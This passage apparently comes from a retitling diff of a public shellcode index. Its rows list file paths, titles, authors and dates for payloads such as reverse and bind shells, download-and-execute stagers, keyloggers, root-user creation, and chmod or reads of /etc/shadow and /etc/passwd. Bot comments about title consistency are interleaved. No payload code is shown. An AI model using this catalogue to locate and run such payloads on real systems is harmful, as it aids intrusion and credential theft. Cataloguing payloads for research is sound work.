493 36779 shellcodes/windows_x86/36779.c Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes) Windows/x86 (XP SP3) - Create (file.txt) Shellcode (83 bytes) 2015-04-17 TUNISIAN CYBER shellcode windows_x86
494 36780 shellcodes/windows_x86/36780.c Windows XP SP3 x86 - Restart Shellcode (57 bytes) Windows/x86 (XP SP3) - Restart Shellcode (57 bytes) 2015-04-17 TUNISIAN CYBER shellcode windows_x86
495 36781 shellcodes/generator/36781.py Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator) 2015-04-17 Konstantinos Alexiou shellcode generator
496 36857 shellcodes/linux_x86/36857.c Linux/x86 - execve(/bin/sh) (Push Method) Shellcode (21 bytes) Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes) 2015-04-29 noviceflux shellcode linux_x86
497 36858 shellcodes/linux_x86-64/36858.c Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes) 2015-04-29 noviceflux shellcode linux_x86-64
498 36921 shellcodes/linux_x86/36921.c Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes) 2015-05-06 Oleg Boytsev shellcode linux_x86
499 36908 shellcodes/linux_x86/36908.c Linux/x86 - exit(0) Shellcode (6 bytes) 2015-05-04 Febriyanto Nugroho shellcode linux_x86
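Review bot: the new title for row 24318 writes the dual-architecture prefix as "Windows/x86-64 / x86 (2000/XP/7)", which does not match the form used elsewhere in this file for the same case ("Linux x86/x86-64" on rows 39336-39338). Suggest picking one form for dual-architecture entries so platform filters on the title do not need two patterns. Minor style point in the same block: row 36411 puts its qualifier after the noun ("Execute Shellcode Using Powershell"), while the other retitled rows join qualifiers with " + " before "Shellcode".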
504 37297 shellcodes/linux_x86/37297.txt Linux/x86 - Read /etc/passwd Shellcode (58 bytes) 2015-06-16 B3mB4m shellcode linux_x86
505 37358 shellcodes/linux_x86/37358.c Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes) 2015-06-24 B3mB4m shellcode linux_x86
506 37359 shellcodes/linux_x86/37359.c Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes) 2015-06-24 B3mB4m shellcode linux_x86
507 37362 shellcodes/linux_x86-64/37362.c Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes) Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes) 2015-06-24 Bill Borskey shellcode linux_x86-64
508 37365 shellcodes/linux_x86/37365.c Linux/x86 - Download File + Execute Shellcode 2015-06-24 B3mB4m shellcode linux_x86
509 37366 shellcodes/linux_x86/37366.c Linux/x86 - Reboot Shellcode (28 bytes) Linux/x86 - Reboot() Shellcode (28 bytes) 2015-06-24 B3mB4m shellcode linux_x86
510 37384 shellcodes/linux_x86/37384.c Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (1) 2015-06-26 Bill Borskey shellcode linux_x86
511 37390 shellcodes/linux_x86/37390.asm Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes) 2015-06-26 Mohammad Reza Espargham shellcode linux_x86
512 37391 shellcodes/linux_x86/37391.asm Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes) 2015-06-26 Mohammad Reza Espargham shellcode linux_x86
513 37392 shellcodes/linux_x86/37392.asm Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes) 2015-06-26 Mohammad Reza Espargham shellcode linux_x86
514 37393 shellcodes/linux_x86/37393.asm Linux/x86 - exec /bin/dash Shellcode (45 bytes) 2015-06-26 Mohammad Reza Espargham shellcode linux_x86
515 37401 shellcodes/linux_x86-64/37401.asm Linux/x86-64 - execve() Encoded Shellcode (57 bytes) 2015-06-27 Bill Borskey shellcode linux_x86-64
516 37495 shellcodes/linux_x86/37495.py Linux/x86 - execve(/bin/sh) ROT7 Encoded Shellcode Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode 2015-07-05 Artem T shellcode linux_x86
517 37664 shellcodes/windows_x86/37664.c Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes) Windows/x86 (XP SP3) (Turkish) - MessageBox Shellcode (24 bytes) 2015-07-21 B3mB4m shellcode windows_x86
518 37749 shellcodes/linux_x86/37749.c Linux/x86 - Egghunter Shellcode (19 bytes) Linux/x86 - Egghunter (0x50905090) Without Hardcoded Signature Shellcode (19 bytes) 2015-08-10 Guillaume Kaddouch shellcode linux_x86
519 37758 shellcodes/windows_x86/37758.c Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes) Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes) 2015-08-12 noviceflux shellcode windows_x86
520 37762 shellcodes/linux_x86/37762.py Linux/x86 - execve(/bin/sh) ROL/ROR Encoded Shellcode Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode 2015-08-12 Anastasios Monachos shellcode linux_x86
521 37895 shellcodes/windows_x86-64/37895.asm Windows 2003 x64 - Token Stealing Shellcode (59 bytes) Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes) 2015-08-20 Fitzl Csaba shellcode windows_x86-64
522 38065 shellcodes/osx/38065.txt OSX/x86-64 - execve(/bin/sh) Null-Free Shellcode (34 bytes) OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes) 2015-09-02 Fitzl Csaba shellcode osx
523 38075 shellcodes/system_z/38075.txt Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes) 2015-09-02 Bigendian Smalls shellcode system_z
524 38088 shellcodes/linux_x86/38088.c Linux/x86 - execve(/bin/bash) Shellcode (31 bytes) 2015-09-06 Ajith Kp shellcode linux_x86
525 38094 shellcodes/generator/38094.c Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) 2015-09-07 Ajith Kp shellcode generator
529 38194 shellcodes/android/38194.c Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes) 2015-09-15 Steven Padilla shellcode android
530 38239 shellcodes/linux_x86-64/38239.asm Linux/x86-64 - execve() Shellcode (22 bytes) 2015-09-18 d4sh&r shellcode linux_x86-64
531 38469 shellcodes/linux_x86-64/38469.c Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes) 2015-10-15 d4sh&r shellcode linux_x86-64
532 38708 shellcodes/linux_x86-64/38708.asm Linux/x86-64 - Egghunter Shellcode (24 bytes) Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes) 2015-11-16 d4sh&r shellcode linux_x86-64
533 38815 shellcodes/linux_x86-64/38815.c Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes) 2015-11-25 d4sh&r shellcode linux_x86-64
534 38959 shellcodes/generator/38959.py Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator) Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator) 2015-12-13 B3mB4m shellcode generator
535 39149 shellcodes/linux_x86-64/39149.c Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) 2016-01-01 Scorpion_ shellcode linux_x86-64
536 39152 shellcodes/linux_x86-64/39152.c Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes) 2016-01-02 Sathish kumar shellcode linux_x86-64
537 39160 shellcodes/linux_x86/39160.c Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1) 2016-01-04 Dennis 'dhn' Herrmann shellcode linux_x86
538 39185 shellcodes/linux_x86-64/39185.c Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) 2016-01-06 Sathish kumar shellcode linux_x86-64
539 39203 shellcodes/linux_x86-64/39203.c Linux/x86-64 - Egghunter Shellcode (18 bytes) Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes) 2016-01-08 Sathish kumar shellcode linux_x86-64
540 39204 shellcodes/linux_x86/39204.c Linux/x86 - Egghunter Shellcode (13 bytes) Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes) 2016-01-08 Dennis 'dhn' Herrmann shellcode linux_x86
541 39312 shellcodes/linux_x86-64/39312.c Linux/x86-64 - execve() XOR/NOT/DIV Encoded Shellcode (54 bytes) Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes) 2016-01-25 Sathish kumar shellcode linux_x86-64
542 39336 shellcodes/linux/39336.c Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes) 2016-01-27 B3mB4m shellcode linux
543 39337 shellcodes/linux/39337.c Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes) 2016-01-27 B3mB4m shellcode linux
544 39338 shellcodes/linux/39338.c Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes) 2016-01-27 B3mB4m shellcode linux
547 39389 shellcodes/linux_x86/39389.c Linux/x86 - Download File + Execute Shellcode (135 bytes) 2016-02-01 B3mB4m shellcode linux_x86
548 39390 shellcodes/linux_x86-64/39390.c Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes) 2016-02-01 Sathish kumar shellcode linux_x86-64
549 39496 shellcodes/arm/39496.c Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes) 2016-02-26 Xeon shellcode arm
550 39519 shellcodes/windows_x86/39519.c Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes) Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes) 2016-03-02 Sean Dillon shellcode windows_x86
551 39578 shellcodes/linux_x86-64/39578.c Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes) 2016-03-21 Sudhanshu Chauhan shellcode linux_x86-64
552 39617 shellcodes/linux_x86-64/39617.c Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes) 2016-03-24 Ajith Kp shellcode linux_x86-64
553 39624 shellcodes/linux_x86-64/39624.c Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1) 2016-03-28 Ajith Kp shellcode linux_x86-64
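Review bot: row 39519 is missing the " + " separator that this change adds everywhere else. Its new title still reads "(//192.168.1.19/c) Null-Free Shellcode (96 bytes)", while the other retitled rows use "+ Null-Free Shellcode" (for example 37362 and 39731). Suggest "Run via WebDAV (//192.168.1.19/c) + Null-Free Shellcode (96 bytes)" for consistency.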
555 39684 shellcodes/linux_x86-64/39684.c Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes) 2016-04-11 Ajith Kp shellcode linux_x86-64
556 39700 shellcodes/linux_x86-64/39700.c Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes) 2016-04-15 Ajith Kp shellcode linux_x86-64
557 39718 shellcodes/linux_x86-64/39718.c Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes) 2016-04-21 Ajith Kp shellcode linux_x86-64
558 40094 shellcodes/windows_x86/40094.c Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes) Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes) 2016-07-13 Roziul Hasan Khan Shifat shellcode windows_x86
559 39722 shellcodes/linux_x86/39722.c Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes) 2016-04-25 Roziul Hasan Khan Shifat shellcode linux_x86
560 39723 shellcodes/linux_x86/39723.c Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes) 2016-04-25 Roziul Hasan Khan Shifat shellcode linux_x86
561 39728 shellcodes/generator/39728.py Linux/x86-64 - Bind TCP Shell Shellcode (Generator) 2016-04-25 Ajith Kp shellcode generator
562 39731 shellcodes/windows/39731.c Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes) Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes) 2016-04-25 Fugu shellcode windows
563 39754 shellcodes/windows_x86/39754.txt Windows .Net Framework x86 - Execute Native x86 Shellcode Windows/x86 (.Net Framework) - Execute Native x86 Shellcode 2016-05-02 Jacky5112 shellcode windows_x86
564 39758 shellcodes/linux_x86-64/39758.c Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes) 2016-05-04 Roziul Hasan Khan Shifat shellcode linux_x86-64
565 39763 shellcodes/linux_x86-64/39763.c Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes) 2016-05-04 Roziul Hasan Khan Shifat shellcode linux_x86-64
566 39794 shellcodes/windows/39794.c Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes) Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes) 2016-05-10 Fugu shellcode windows
567 39815 shellcodes/generator/39815.c Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator) 2016-05-16 JollyFrogs shellcode generator
568 39847 shellcodes/linux_x86-64/39847.c Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes) 2016-05-23 Roziul Hasan Khan Shifat shellcode linux_x86-64
569 39851 shellcodes/linux_x86/39851.c Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes) 2016-05-25 Brandon Dennis shellcode linux_x86
570 39869 shellcodes/linux_x86-64/39869.c Linux/x86-64 - execve() XOR Encoded Shellcode (84 bytes) Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes) 2016-05-30 Roziul Hasan Khan Shifat shellcode linux_x86-64
571 39885 shellcodes/multiple/39885.c BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) 2016-06-06 odzhancode shellcode multiple
572 39900 shellcodes/windows_x86/39900.c Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes) Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes) 2016-06-07 Roziul Hasan Khan Shifat shellcode windows_x86
573 39901 shellcodes/linux_x86/39901.c Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes) 2016-06-07 sajith shellcode linux_x86
574 39914 shellcodes/windows_x86/39914.c Windows x86 - system(_systeminfo_) Shellcode (224 bytes) Windows/x86 - system(systeminfo) Shellcode (224 bytes) 2016-06-10 Roziul Hasan Khan Shifat shellcode windows_x86
575 39979 shellcodes/windows/39979.c Windows XP < 10 - Download File + Execute Shellcode Windows (XP < 10) - Download File + Execute Shellcode 2016-06-20 B3mB4m shellcode windows
576 40005 shellcodes/windows_x86/40005.c Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes) Windows/x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes) 2016-06-22 Roziul Hasan Khan Shifat shellcode windows_x86
577 40026 shellcodes/linux_x86/40026.txt Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode 2016-06-27 Pawan Lal shellcode linux_x86
578 40029 shellcodes/linux_x86-64/40029.c Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes) 2016-06-28 Roziul Hasan Khan Shifat shellcode linux_x86-64
579 40052 shellcodes/linux_x86-64/40052.c Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes) 2016-07-04 Kyzer shellcode linux_x86-64
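Review bot: the underscore placeholders are cleaned up inconsistently in the retitled Windows/x86 rows of this block. Row 39914 goes from system(_systeminfo_) to system(systeminfo), but the new titles for 39900 (WinExec(_cmd.exe__0)) and 40005 (ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1)) keep the placeholders, and the untouched 39885 row still has them as well. Apply one convention to every row being retitled here, so a title search for the API call matches all of them.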
581 40061 shellcodes/linux_x86-64/40061.c Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes) 2016-07-06 Kyzer shellcode linux_x86-64
582 40075 shellcodes/linux_x86/40075.c Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes) 2016-07-08 sajith shellcode linux_x86
583 40079 shellcodes/linux_x86-64/40079.c Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes) 2016-07-11 Kyzer shellcode linux_x86-64
584 40110 shellcodes/linux_x86/40110.c Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes) Linux/x86 - Reverse TCP (127.1.1.1:10) Xterm Shell Shellcode (68 bytes) 2016-07-13 RTV shellcode linux_x86
585 40122 shellcodes/linux_x86-64/40122.txt Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes) 2016-07-19 Kyzer shellcode linux_x86-64
586 40128 shellcodes/linux_crisv32/40128.c Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes) 2016-07-20 bashis shellcode linux_crisv32
587 40131 shellcodes/linux_x86/40131.c Linux/x86 - execve(/bin/sh) Shellcode (19 bytes) 2016-07-20 sajith shellcode linux_x86
588 40139 shellcodes/linux_x86-64/40139.c Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes) 2016-07-21 Kyzer shellcode linux_x86-64
589 40175 shellcodes/windows_x86/40175.c Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes) Windows/x86 (7) - localhost Port Scanner Shellcode (556 bytes) 2016-07-29 Roziul Hasan Khan Shifat shellcode windows_x86
590 40179 shellcodes/linux_x86/40179.c Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes) Linux/x86 - Bind TCP/UDP (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes) 2016-07-29 Kyzer shellcode linux_x86
591 40222 shellcodes/linux_x86/40222.c Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes) 2016-08-10 thryb shellcode linux_x86
592 40223 shellcodes/linux_x86/40223.c Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes) 2016-08-10 thryb shellcode linux_x86
593 40245 shellcodes/windows_x86/40245.c Windows x86 - MessageBoxA Shellcode (242 bytes) Windows/x86 - MessageBoxA Shellcode (242 bytes) 2016-08-16 Roziul Hasan Khan Shifat shellcode windows_x86
594 40246 shellcodes/windows_x86/40246.c Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes) Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes) 2016-08-16 Roziul Hasan Khan Shifat shellcode windows_x86
595 40259 shellcodes/windows_x86/40259.c Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes) Windows/x86 - InitiateSystemShutdownA() Shellcode (599 bytes) 2016-08-18 Roziul Hasan Khan Shifat shellcode windows_x86
596 43562 shellcodes/linux_x86-64/43562.c Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter Shellcode (157 bytes) Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
597 43563 shellcodes/linux_x86-64/43563.c Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{shadow_passwd} Shellcode (358 bytes) Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
598 43564 shellcodes/linux_x86-64/43564.c Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{shadow_passwd} Shellcode (273 bytes) Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
599 43565 shellcodes/linux_x86-64/43565.asm Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes) 2009-01-01 Mr.Un1k0d3r shellcode linux_x86-64
600 43566 shellcodes/linux_x86-64/43566.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
601 43568 shellcodes/linux_x86-64/43568.asm Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes) 2009-01-01 Andriy Brukhovetskyy shellcode linux_x86-64
602 43570 shellcodes/linux_x86-64/43570.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes) 2009-01-01 Andriy Brukhovetskyy shellcode linux_x86-64
603 43597 shellcodes/linux_x86-64/43597.c Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes) Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes) 2009-01-01 Geyslan G. Bem shellcode linux_x86-64
604 43598 shellcodes/linux_x86-64/43598.c Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes) 2012-10-04 Russell Willis shellcode linux_x86-64
605 43599 shellcodes/linux_x86-64/43599.c Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes) 2012-10-04 Russell Willis shellcode linux_x86-64
606 43601 shellcodes/linux_x86-64/43601.asm Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes) 2009-01-01 Gaussillusion shellcode linux_x86-64
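Review bot: row 43597 (shellcodes/linux_x86-64/43597.c) ends up with the same title text, byte count (57) and author as row 43731 under linux_x86 later in this change, "Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)" by Geyslan G. Bem, differing only in the platform prefix. Please confirm these are two distinct payloads and that the platform column is right for each; if they are distinct, nothing in the titles lets a reader tell which is which apart from the prefix.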
613 43608 shellcodes/openbsd_x86/43608.c OpenBSD/x86 - reboot() Shellcode (15 bytes) 2009-01-01 beosroot shellcode openbsd_x86
614 43610 shellcodes/osx_ppc/43610.c OSX/PPC - Remote findsock by recv() Key Shellcode 2009-01-01 Dino Dai Zovi shellcode osx_ppc
615 43611 shellcodes/osx_ppc/43611.asm OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode 2009-01-01 H D Moore shellcode osx_ppc
616 43612 shellcodes/osx_ppc/43612.asm OSX/PPC - Stager Sock Find MSG_PEEK Shellcode OSX/PPC - Stager Sock Find MSG_PEEK + Null-Free Shellcode 2009-01-01 H D Moore shellcode osx_ppc
617 43613 shellcodes/osx_ppc/43613.asm OSX/PPC - Stager Sock Find Shellcode 2009-01-01 H D Moore shellcode osx_ppc
618 43614 shellcodes/osx_ppc/43614.asm OSX/PPC - Stager Sock Reverse Shellcode 2009-01-01 H D Moore shellcode osx_ppc
619 43615 shellcodes/osx_ppc/43615.c OSX/PPC - Bind TCP (8000/TCP) Shell + OSXPPCLongXOR Encoded Shellcode (300 bytes) 2009-01-01 H D Moore shellcode osx_ppc
620 43616 shellcodes/osx_ppc/43616.asm OSX/PPC - execve(/bin/sh) Shellcode OSX/PPC - execve(/bin/sh) + Null-Free Shellcode 2009-01-01 ghandi shellcode osx_ppc
621 43617 shellcodes/osx_ppc/43617.c OSX/PPC - execve(/bin/sh_[/bin/sh]_NULL) + exit() Shellcode (72 bytes) 2009-01-01 haphet shellcode osx_ppc
622 43618 shellcodes/osx/43618.c OSX/x86 - execve(/bin/sh) Shellcode (24 bytes) 2009-01-01 haphet shellcode osx
623 43626 shellcodes/linux_x86/43626.c Linux/x86 - Add User (t00r/t00r) PexFnstenvSub Encoded Shellcode (116 bytes) 2009-01-01 vlad902 shellcode linux_x86
667 43669 shellcodes/linux_x86/43669.c Linux/x86 - Add Root User To /etc/passwd + No Password + exit() Shellcode (83 bytes) 2009-01-01 bob shellcode linux_x86
668 43670 shellcodes/linux_x86/43670.c Linux/x86 - setuid() + execve() + exit() Shellcode (44 bytes) 2009-01-01 bob shellcode linux_x86
669 43671 shellcodes/linux_x86/43671.c Linux/x86 - chmod(/bin/sh_04775) + set sh +s Shellcode (31 bytes) 2009-01-01 bob shellcode linux_x86
670 43672 shellcodes/generator/43672.c Linux/x86 - socket-proxy Shellcode (372 bytes) (Generator) Linux/x86 - Socket-proxy Shellcode (372 bytes) (Generator) 2009-01-01 Russell Sanford shellcode generator
671 43673 shellcodes/linux_x86/43673.c Linux/x86 - setresuid(0_0_0) + execve(/bin/sh) + exit() Shellcode (41 bytes) 2009-01-01 sacrine shellcode linux_x86
672 43674 shellcodes/linux_x86/43674.c Linux/x86 - Reverse TCP (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes) 2009-01-01 eSDee shellcode linux_x86
673 43675 shellcodes/linux_x86/43675.c Linux/x86 - Bind TCP (45295/TCP) Shell (/bin/sh) + fork() Shellcode (200 bytes) 2009-01-01 eSDee shellcode linux_x86
682 43688 shellcodes/linux_x86/43688.c Linux/x86 - exit(0) Shellcode (8 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
683 43689 shellcodes/linux_x86/43689.c Linux/x86 - sync Shellcode (6 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
684 43690 shellcodes/linux_x86/43690.c Linux/x86 - execve(/bin/sh_ -c_ ping localhost) Shellcode (55 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
685 43691 shellcodes/linux_x86/43691.c Linux/x86 - rmdir(_/tmp/willdeleted_) Shellcode (41 bytes) Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
686 43692 shellcodes/linux_x86/43692.c Linux/x86 - setdomainname(_th1s s3rv3r h4s b33n h1j4ck3d !!_) Shellcode (58 bytes) Linux/x86 - setdomainname(th1s s3rv3r h4s b33n h1j4ck3d !!) Shellcode (58 bytes) 2010-06-02 gunslinger_ shellcode linux_x86
687 43694 shellcodes/linux_x86/43694.c Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes) 2018-01-14 Hashim Jawad shellcode linux_x86
688 43695 shellcodes/linux_x86/43695.c Linux/x86 - Force unmount /media/disk Shellcode (33 bytes) 2010-06-04 gunslinger_ shellcode linux_x86
689 43696 shellcodes/linux_x86/43696.c Linux/x86 - chmod(/etc/shadow_ 0666) + ASCII Shellcode (443 bytes) 2009-01-01 agix shellcode linux_x86
691 43698 shellcodes/linux_x86/43698.c Linux/x86 - Bind TCP (31337/TCP) Shell + Polymorphic Shellcode (125 bytes) 2010-06-17 gunslinger_ shellcode linux_x86
692 43699 shellcodes/linux_x86/43699.c Linux/x86 - /sbin/iptables -POUTPUT DROP Shellcode (60 bytes) 2009-01-01 John Babio shellcode linux_x86
693 43700 shellcodes/linux_x86/43700.c Linux/x86 - /usr/bin/killall snort Shellcode (46 bytes) 2009-01-01 John Babio shellcode linux_x86
694 43701 43702 shellcodes/linux_x86/43701.c shellcodes/linux_x86/43702.c Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3) 2009-01-01 John Babio Kernel_Panik shellcode linux_x86
43702 shellcodes/linux_x86/43702.c Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (5) 2009-01-01 Kernel_Panik shellcode linux_x86
695 43703 shellcodes/linux_x86/43703.c Linux/x86 - execve(/bin/dash) Shellcode (49 bytes) 2009-01-01 Chroniccommand shellcode linux_x86
696 43704 shellcodes/linux_x86/43704.c Linux/x86 - execve(/bin/cat_ /etc/shadow_ NULL) Shellcode (42 bytes) 2009-01-01 antrhacks shellcode linux_x86
697 43705 shellcodes/linux_x86/43705.c Linux/x86 - /etc/init.d/apparmor teardown Shellcode (53 bytes) 2009-01-01 John Babio shellcode linux_x86
707 43722 shellcodes/linux_x86/43722.c Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (2) 2009-01-01 Hamza Megahed shellcode linux_x86
708 43725 shellcodes/linux_x86/43725.c Linux/x86 - Force Reboot Shellcode (36 bytes) 2009-01-01 Hamza Megahed shellcode linux_x86
709 43724 shellcodes/linux_x86/43724.c Linux/x86 - execve(chmod 0777 /etc/shadow) Shellcode (57 bytes) 2009-01-01 Hamza Megahed shellcode linux_x86
710 43726 shellcodes/linux_x86/43726.c Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) Shellcode (103 bytes) Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) + Null-Free Shellcode (103 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
